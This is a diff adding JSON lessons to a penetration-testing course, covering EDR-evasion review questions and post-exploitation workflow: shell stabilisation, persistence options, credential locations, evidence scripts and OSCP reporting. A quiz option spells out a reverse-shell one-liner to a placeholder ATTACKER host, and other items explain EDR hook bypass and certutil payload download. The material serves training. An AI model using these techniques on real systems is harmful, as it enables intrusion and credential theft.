+      "simplified_explanation": "Stay within scope when testing evasion techniques.",
+      "memory_aids": [
+        "Scope before stealth."
+      ],
+      "real_world_connection": "Clients blacklist firms that disable antivirus without explicit approval.",
+      "reflection_prompt": "How will you communicate your evasion tests to defenders ahead of time?",
+      "is_interactive": false,
+      "xp_reward": 0
+    },
+    {
+      "block_id": "2c9b9871-fa05-4d77-9283-b50b242de0ba",
+      "type": "reflection",
+      "title": "Evasion Retrospective",
+      "content": {
+        "text": "After lab practice document:\n\n- Which payload variants bypassed Defender and why?\n- What telemetry did you monitor to confirm stealth?\n- Which LOLBins felt most natural for the target environment?\n- How will you articulate remediation steps for each bypass?\n- What safeguards ensured you stayed within scope?\n\nConvert findings into a table for your exam report template."
+      },
+      "simplified_explanation": "Review payload success, telemetry, LOLBins, mitigations, and scope controls.",
+      "memory_aids": [],
+      "real_world_connection": "",
+      "reflection_prompt": "Which question highlights a communication gap with blue teams?",
+      "is_interactive": false,
+      "xp_reward": 0
+    }
+  ],
+  "post_assessment": [
+    {
+      "question": "Which Sysmon event ID is most associated with network connections that may reveal command and control traffic?",
+      "options": [
+        "Event ID 1",
+        "Event ID 3",
+        "Event ID 7",
+        "Event ID 10"
+      ],
+      "correct_answer": 1,
+      "explanation": "Sysmon event ID 3 records network connections, useful for spotting C2 beacons.",
+      "question_id": "2cd0198f-4d9c-459a-ba19-2708ef2bc6f8",
+      "type": "multiple_choice",
+      "difficulty": 3
+    },
+    {
+      "question": "Why does reimplementing shellcode execution using direct syscalls reduce detection by some EDR products?",
+      "options": [
+        "Direct syscalls encrypt payloads by default",
+        "Syscalls avoid userland API hooks commonly used by EDRs",
+        "Syscalls automatically disable Windows Defender",
+        "EDRs cannot monitor kernel activity"
+      ],
+      "correct_answer": 1,
+      "explanation": "EDRs often hook userland APIs, so invoking syscalls directly bypasses those hooks and reduces detections.",
+      "question_id": "32123a30-33b2-46ca-8fa0-d451e6e82e22",
+      "type": "multiple_choice",
+      "difficulty": 3
+    },
+    {
+      "question": "Which living-off-the-land binary is commonly abused to download and decode payloads on Windows?",
+      "options": [
+        "wevtutil",
+        "diskpart",
+        "certutil",
+        "taskkill"
+      ],
+      "correct_answer": 2,
+      "explanation": "certutil can fetch remote content and decode base64 payloads, making it a popular LOLBin.",
+      "question_id": "34be7042-8e49-4b58-859c-8b6a8da9ba4e",
+      "type": "multiple_choice",
+      "difficulty": 3
+    }
+  ]
+}

--- a/content/lesson_pentest_29_post_exploitation_operations_reporting_RICH.json
+++ b/content/lesson_pentest_29_post_exploitation_operations_reporting_RICH.json
@@ -1,0 +1,271 @@
+{
+  "lesson_id": "f48ca9db-0fcd-44f9-9c3e-7d3bf626e707",
+  "domain": "pentest",
+  "title": "Post-Exploitation Operations and Reporting",
+  "subtitle": "Stabilising access, harvesting evidence, and writing exam-ready reports",
+  "difficulty": 2,
+  "estimated_time": 70,
+  "order_index": 29,
+  "author": "CyberLearn Offensive Curriculum Team",
+  "base_xp_reward": 180,
+  "mastery_threshold": 78,
+  "is_core_concept": true,
+  "created_at": "2025-01-20T12:00:00",
+  "updated_at": "2025-01-20T12:00:00",
+  "version": "1.0",
+  "prerequisites": [
+    "Pivoting",
+    "Credential Operations"
+  ],
+  "concepts": [
+    "Stabilising shells",
+    "Credential harvesting",
+    "Data exfiltration planning",
+    "Evidence collection",
+    "Persistence tradecraft",
+    "Cleanup procedures",
+    "Reporting structure",
+    "Remediation guidance"
+  ],
+  "learning_objectives": [
+    "Stabilise access and maintain control without breaking scope",
+    "Collect high-value data and credentials ethically",
+    "Plan minimal, documented persistence options for lab practice",
+    "Organise notes and screenshots into report-ready material",
+    "Deliver clear remediation steps aligned with business risk"
+  ],
+  "jim_kwik_principles": [
+    "Active recall",
+    "Teach to learn"
+  ],
+  "content_blocks": [
+    {
+      "block_id": "c0c20f38-2414-491d-a225-697d15afa6aa",
+      "type": "explanation",
+      "title": "Post-Exploitation Mindset",
+      "content": {
+        "text": "# After the Shell\n\nExploitation grants you access; post-exploitation proves impact. In PWK labs and the OSCP exam, you must harvest evidence responsibly, maintain stability, and document everything. Your guiding principles:\n\n- Respect scope: only access approved systems and data.\n- Prioritise business impact: focus on credentials, sensitive files, and system control.\n- Prepare to report: every action must translate into a clear narrative.\n\nThis lesson covers stabilising sessions, gathering artifacts, and shaping them into a compelling report."
+      },
+      "simplified_explanation": "Post-exploitation is about proving impact while respecting scope and documentation.",
+      "memory_aids": [
+        "Impact over curiosity."
+      ],
+      "real_world_connection": "Professional assessments succeed when reports show exactly what was accessed and how.",
+      "reflection_prompt": "How do you currently prioritise targets after gaining a shell?",
+      "is_interactive": false,
+      "xp_reward": 0
+    },
+    {
+      "block_id": "4c9bc21e-1c1a-4bdf-a120-9b23b543622d",
+      "type": "explanation",
+      "title": "Stabilising and Maintaining Access",
+      "content": {
+        "text": "# Shell Management\n\n- Upgrade shells to stable TTYs using `python3 -c 'import pty; pty.spawn(\"/bin/bash\")'` and `stty raw -echo`.\n- Use `rlwrap` or tmux sessions to maintain command history.\n- For Windows, prefer `evil-winrm`, `psexec`, or `smbexec` for stable interactive access.\n\n## Persistence Considerations\n\nIn exams you should avoid long-term persistence, but understand techniques:\n- Scheduled tasks or cron jobs launching call-backs.\n- Registry Run keys or systemd service units.\n- SSH authorised_keys insertion.\n\nDocument potential persistence options even if you do not deploy them, demonstrating understanding without violating scope."
+      },
+      "simplified_explanation": "Stabilise shells and understand persistence without abusing it in exams.",
+      "memory_aids": [
+        "Stabilise, then strategise"
+      ],
+      "real_world_connection": "Clients appreciate when testers explain what persistence would look like without deploying it.",
+      "reflection_prompt": "Which persistence vector would you recommend if a client asked for red team readiness?",
+      "is_interactive": false,
+      "xp_reward": 0
+    },
+    {
+      "block_id": "61ee6d16-9678-483a-af4e-1fda9acd6725",
+      "type": "explanation",
+      "title": "Data and Credential Harvesting",
+      "content": {
+        "text": "# High-Value Targets\n\n- Windows: C:\\Users\\*\\Desktop, DPAPI secrets, LSASS memory (when allowed), cached GPP passwords.\n- Linux: /etc/passwd, /etc/shadow, /var/backups, SSH keys, configuration files.\n- Applications: database connection strings, API keys, config.php files.\n\n## Exfiltration Planning\n\n- Only collect data necessary to prove access.\n- Use compression (tar, zip) and encryption when moving data across lab boundaries.\n- Record hashes of files taken to validate integrity and support cleanup.\n\nAlways annotate where data came from and how it will be returned or destroyed."
+      },
+      "simplified_explanation": "Prioritise credentials and sensitive configs while limiting scope of exfiltration.",
+      "memory_aids": [
+        "Credentials + configs"
+      ],
+      "real_world_connection": "Incident response teams rely on your detailed notes to verify what was accessed.",
+      "reflection_prompt": "How will you prove you accessed sensitive data without over-collecting?",
+      "is_interactive": false,
+      "xp_reward": 0
+    },
+    {
+      "block_id": "1bad2e83-026a-41d6-b290-9bd26e8eea30",
+      "type": "explanation",
+      "title": "Evidence and Reporting Workflow",
+      "content": {
+        "text": "# Evidence Capture\n\n- Take screenshots of commands that prove exploitation and impact (e.g., proof.txt, sensitive data).\n- Record timestamps, hostnames, and command outputs.\n- Use script logging (script command on Linux, Start-Transcript in PowerShell) to capture sessions.\n\n## Reporting Structure\n\nOrganise your report sections:\n1. Executive Summary: business impact and risk rating.\n2. Technical Findings: steps to exploit, evidence, affected assets.\n3. Remediation: actionable recommendations.\n4. Appendix: command logs, tool versions, proof screenshots.\n\nStart templating your report early; populating during engagement saves time before deadlines."
+      },
+      "simplified_explanation": "Capture evidence meticulously and structure reports into summary, findings, remediation, appendix.",
+      "memory_aids": [
+        "Evidence now, report faster later."
+      ],
+      "real_world_connection": "OSCP exam requires detailed report with replicable steps and screenshots.",
+      "reflection_prompt": "What template or tooling do you use to capture evidence during labs?",
+      "is_interactive": false,
+      "xp_reward": 0
+    },
+    {
+      "block_id": "4ff9424c-fd70-499d-b1b7-245b38d3982f",
+      "type": "code_exercise",
+      "title": "Shell Stabilisation Drill",
+      "content": {
+        "text": "Practise stabilising shells on a Linux target:\n\n1. Exploit a lab box to obtain a netcat shell.\n2. Run `python3 -c 'import pty; pty.spawn(\"/bin/bash\")'` to upgrade.\n3. Background the shell with Ctrl+Z, then on your terminal run `stty raw -echo; fg` and `reset`.\n4. Export environment variables TERM=xterm-256color for readability.\n5. Log the session with `script -af postex.log`.\n\nReflect on latency, command history, and reliability improvements."
+      },
+      "simplified_explanation": "Upgrade simple shells into interactive TTYs and log the session.",
+      "memory_aids": [],
+      "real_world_connection": "Stable shells prevent mistakes when editing files or running sudo.",
+      "reflection_prompt": "Which step in the stabilisation sequence do you forget most often?",
+      "is_interactive": false,
+      "xp_reward": 0
+    },
+    {
+      "block_id": "ff7fb761-6872-4fa5-92a0-7615cc7654f5",
+      "type": "code_exercise",
+      "title": "Evidence Capture Automation",
+      "content": {
+        "text": "Build a script to snapshot critical evidence:\n\n```bash\n#!/bin/bash\nHOST=$(hostname)\nOUTDIR=$1\nmkdir -p \"$OUTDIR/$HOST\"\ndate > \"$OUTDIR/$HOST/timestamp.txt\"\nwhoami > \"$OUTDIR/$HOST/whoami.txt\"\nip addr show > \"$OUTDIR/$HOST/ip.txt\"\nif [ -f /root/proof.txt ]; then\n  cp /root/proof.txt \"$OUTDIR/$HOST/proof.txt\"\nfi\n```\n\n- Execute with `./capture.sh evidence` and sync results back securely.\n- Extend to gather registry exports or event logs on Windows using PowerShell.\n\nAutomating evidence collection reduces manual errors during exams."
+      },
+      "simplified_explanation": "Automate gathering key evidence files into a structured folder.",
+      "memory_aids": [],
+      "real_world_connection": "Automation ensures nothing is missed during high-pressure reporting windows.",
+      "reflection_prompt": "What additional artifacts should your script collect for Windows hosts?",
+      "is_interactive": false,
+      "xp_reward": 0
+    },
+    {
+      "block_id": "eab329bb-ac66-45fb-b3d2-23a99d78ac9b",
+      "type": "code_exercise",
+      "title": "Report Template Creation",
+      "content": {
+        "text": "Create a reusable OSCP-style report template:\n\n1. Set up a Markdown or LaTeX document with sections: Executive Summary, Methodology, Findings, Remediation, Appendix.\n2. Include tables for vulnerability details (Impact, Likelihood, CVSS, Evidence).\n3. Embed placeholders for screenshots (e.g., ![Proof](images/host-proof.png)).\n4. Automate PDF export with pandoc or mdpdf.\n\nPopulate the template with data from a recent lab box to test the workflow."
+      },
+      "simplified_explanation": "Build a report template so you can drop in evidence quickly.",
+      "memory_aids": [],
+      "real_world_connection": "Efficient reporting differentiates successful consultants.",
+      "reflection_prompt": "Which section of your report template requires more sample text or guidance?",
+      "is_interactive": false,
+      "xp_reward": 0
+    },
+    {
+      "block_id": "4dc106fa-aefc-419d-8a27-53b32aebc9df",
+      "type": "real_world",
+      "title": "Case Study: Executive Reporting Win",
+      "content": {
+        "text": "A security consultancy compromised a finance server, extracted payroll spreadsheets, and escalated to domain admin. The final report included clear screenshots, timeline of actions, and remediation mapping to CIS Controls. Executives appreciated the actionable summary and funded a privileged access management project. The engagement shows that strong reporting converts technical victories into business change."
+      },
+      "simplified_explanation": "Clear reporting drives executive action on remediation.",
+      "memory_aids": [
+        "Great reports drive change"
+      ],
+      "real_world_connection": "",
+      "reflection_prompt": "How will you translate technical jargon into executive language?",
+      "is_interactive": false,
+      "xp_reward": 0
+    },
+    {
+      "block_id": "6ac4d20e-8ce5-4e07-9c8b-a8120f9c5607",
+      "type": "memory_aid",
+      "title": "Mnemonic: TRACE",
+      "content": {
+        "text": "Use TRACE to remember post-exploitation workflow:\n\n- **T**ake control (stabilise shells)\n- **R**etrieve credentials and data\n- **A**nnotate evidence immediately\n- **C**lean up artifacts and maintain integrity\n- **E**xplain impact in the report\n\nReference TRACE at the end of every lab session."
+      },
+      "simplified_explanation": "TRACE keeps post-exploitation structured.",
+      "memory_aids": [
+        "Take, Retrieve, Annotate, Clean, Explain"
+      ],
+      "real_world_connection": "",
+      "reflection_prompt": "Which TRACE step do you rush through when time is short?",
+      "is_interactive": false,
+      "xp_reward": 0
+    },
+    {
+      "block_id": "7b6273d4-f7e0-40d2-bb1f-9e1ccfc13831",
+      "type": "diagram",
+      "title": "Reporting Pipeline",
+      "content": {
+        "text": "```\nExploit --> Stabilise --> Gather Evidence --> Draft Findings --> Final Report\n     |          |              |                |              |\n  Proof.txt   TTY upgrade   Screenshots     Risk rating     PDF delivery\n  Credentials Persistence   Logs            Remediation     Client briefing\n```"
+      },
+      "simplified_explanation": "Visualise progression from exploitation to final report.",
+      "memory_aids": [
+        "Pipeline ensures nothing is missed."
+      ],
+      "real_world_connection": "",
+      "reflection_prompt": "Where will you store intermediate notes to avoid losing context?",
+      "is_interactive": false,
+      "xp_reward": 0
+    },
+    {
+      "block_id": "0fc2dbe5-b3ab-445f-b94f-1e41f00ecdb9",
+      "type": "mindset_coach",
+      "title": "Document to Dominate",
+      "content": {
+        "text": "When fatigue hits, remind yourself: documentation equals impact. Future you\u2014and your exam proctor\u2014depend on clear notes. Take five-minute breaks to summarise progress, capture screenshots, and update your TRACE checklist."
+      },
+      "simplified_explanation": "Use micro-breaks to keep documentation sharp.",
+      "memory_aids": [
+        "Notes win exams."
+      ],
+      "real_world_connection": "Top OSCP scorers attribute success to disciplined note-taking.",
+      "reflection_prompt": "What time-bound ritual will you adopt to update notes during engagements?",
+      "is_interactive": false,
+      "xp_reward": 0
+    },
+    {
+      "block_id": "cdc983d0-2fec-4d7b-ba04-d5c9ccb350d7",
+      "type": "reflection",
+      "title": "Post-Exploitation Retrospective",
+      "content": {
+        "text": "After each lab machine consider:\n\n- Did you stabilise access effectively?\n- Which credentials or data proved impact?\n- What artifacts require cleanup before exiting?\n- How will you describe the finding to both engineers and executives?\n- What remediation advice did you record?\n\nUpdate your TRACE checklist with answers."
+      },
+      "simplified_explanation": "Review stability, impact data, cleanup, communication, and remediation.",
+      "memory_aids": [],
+      "real_world_connection": "",
+      "reflection_prompt": "Which question reveals the biggest gap in your current reporting process?",
+      "is_interactive": false,
+      "xp_reward": 0
+    }
+  ],
+  "post_assessment": [
+    {
+      "question": "Which Linux command sequence upgrades a basic reverse shell to an interactive TTY?",
+      "options": [
+        "python3 -c 'import pty; pty.spawn(\"/bin/bash\")' followed by stty raw -echo",
+        "nc -lvnp 4444",
+        "bash -i >& /dev/tcp/ATTACKER/4444 0>&1",
+        "socat TCP-LISTEN:4444,fork TCP:TARGET:22"
+      ],
+      "correct_answer": 0,
+      "explanation": "Upgrading with python pty.spawn and adjusting terminal settings provides an interactive TTY for stable post-exploitation.",
+      "question_id": "476b7f05-57be-4b50-a284-d3585909b6fa",
+      "type": "multiple_choice",
+      "difficulty": 2
+    },
+    {
+      "question": "What is the primary reason to capture hashes and metadata for any files you exfiltrate during an engagement?",
+      "options": [
+        "To crack the passwords faster",
+        "To verify integrity and support secure deletion after the assessment",
+        "To automatically populate the final report",
+        "To avoid antivirus detection"
+      ],
+      "correct_answer": 1,
+      "explanation": "Recording hashes confirms integrity, aids chain-of-custody, and ensures you can verify cleanup.",
+      "question_id": "0778e899-e2d4-41a3-9b34-90593edb9b85",
+      "type": "multiple_choice",
+      "difficulty": 2
+    },
+    {
+      "question": "Which section of an OSCP report should summarise business impact in non-technical language?",
+      "options": [
+        "Appendix",
+        "Executive Summary",
+        "Methodology",
+        "Technical Findings"
+      ],
+      "correct_answer": 1,
+      "explanation": "The Executive Summary explains impact and risk in terms stakeholders understand.",
+      "question_id": "59f6f7a7-914d-4d96-89d8-1bc697f82b2e",
+      "type": "multiple_choice",
+      "difficulty": 2
+    }
+  ]
+}


### PR DESCRIPTION
## Summary
- add a Windows privilege escalation field guide with labs, mnemonic aids, and assessment items
- add Linux privilege escalation, credential operations, EDR evasion, and post-exploitation lessons aligned to PWK workflows

## Testing
- `for f in content/lesson_pentest_25_windows_privilege_escalation_field_guide_RICH.json content/lesson_pentest_26_linux_privilege_escalation_playbook_RICH.json content/lesson_pentest_27_password_attacks_credential_operations_RICH.json content/lesson_pentest_28_antivirus_edr_evasion_techniques_RICH.json content/lesson_pentest_29_post_exploitation_operations_reporting_RICH.json; do jq empty "$f" || exit 1; done`

------
https://chatgpt.com/codex/tasks/task_b_69012545b7d48322ab0ac80c78bf29da